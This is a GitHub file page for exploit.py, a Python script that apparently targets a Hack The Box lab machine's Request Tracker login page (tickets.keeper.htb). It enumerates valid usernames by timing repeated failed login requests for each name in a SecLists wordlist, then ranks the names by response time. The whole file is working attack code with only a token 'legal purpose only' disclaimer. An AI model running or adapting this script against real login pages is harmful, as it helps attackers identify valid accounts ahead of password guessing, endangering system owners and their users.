-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
92 lines (70 loc) · 2.78 KB
/
exploit.py
File metadata and controls
92 lines (70 loc) · 2.78 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
## Note: For legale purpose only
import requests
import os
# CONFIG
WORDLIST="/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt"
ADDRESS="http://tickets.keeper.htb/rt/NoAuth/Login.html"
REQUESTCOUNT=75 # higher will produce more accurate results but also takes longer
def avgResponseTime(username):
avgTime=0
data={"user":username,"password":"pass"}
for i in range(REQUESTCOUNT):
response = requests.post(ADDRESS, data=data)
avgTime += response.elapsed.total_seconds()
return avgTime/REQUESTCOUNT
def exploit():
timelist={}
print("[+] start exploit")
if os.stat(WORDLIST).st_size == 0:
print("Error: Aborting because file is empty")
exit(1)
with open(WORDLIST,'r') as temp:
num_lines = sum(1 for line in temp)
print("[+] "+str(REQUESTCOUNT*num_lines)+" requests to send in total")
with open(WORDLIST,"r") as wl:
for username in wl:
timelist[username]= avgResponseTime(username.strip())
print("[+] "+username.strip().ljust(13)+" : "+str(timelist[username]))
if len(timelist) == 0:
print("Error: Something went wrong. Check internet conenction maybe")
exit(1)
return timelist
def analyze(timelist):
highest=list(timelist.keys())[0]
secondHighest=list(timelist.keys())[0]
thirdHighest=list(timelist.keys())[0]
lowest=list(timelist.keys())[0]
secondLowest=list(timelist.keys())[0]
avgTimeOverAll=0.0
overallTimePass=0.0
for i in timelist:
overallTimePass += timelist[i]*REQUESTCOUNT
avgTimeOverAll += timelist[i]
if timelist[i] > timelist[highest]:
highest=i
elif timelist[i] > timelist[secondHighest]:
secondHighest=i
elif timelist[i] > timelist[thirdHighest]:
thirdHighest=i
if timelist[i] < timelist[lowest]:
lowest=i
elif timelist[i] < timelist[secondLowest]:
secondLowest=i
avgTimeOverAll /=len(timelist)
print("[+] Stats:\n")
print("- send "+str(len(timelist)*REQUESTCOUNT)+" requests total")
print("- overall "+str(overallTimePass)+" seconds used")
print("- average time over all: "+str(avgTimeOverAll)+" seconds")
print("- highest times:")
print("1. "+str(highest).strip()+" : "+str(timelist[highest]).strip())
print("2. "+str(secondHighest).strip()+" : "+str(timelist[secondHighest]))
print("3. "+str(thirdHighest).strip()+" : "+str(timelist[thirdHighest]))
print("- lowest times:")
print("1. "+str(lowest).strip()+" : "+str(timelist[lowest]))
print("2. "+str(secondLowest).strip()+" : "+str(timelist[secondLowest]))
def main():
tl=exploit()
print("\n[+] exploit ran successfully")
analyze(tl)
print("\n[+] Finished. Bye")
main()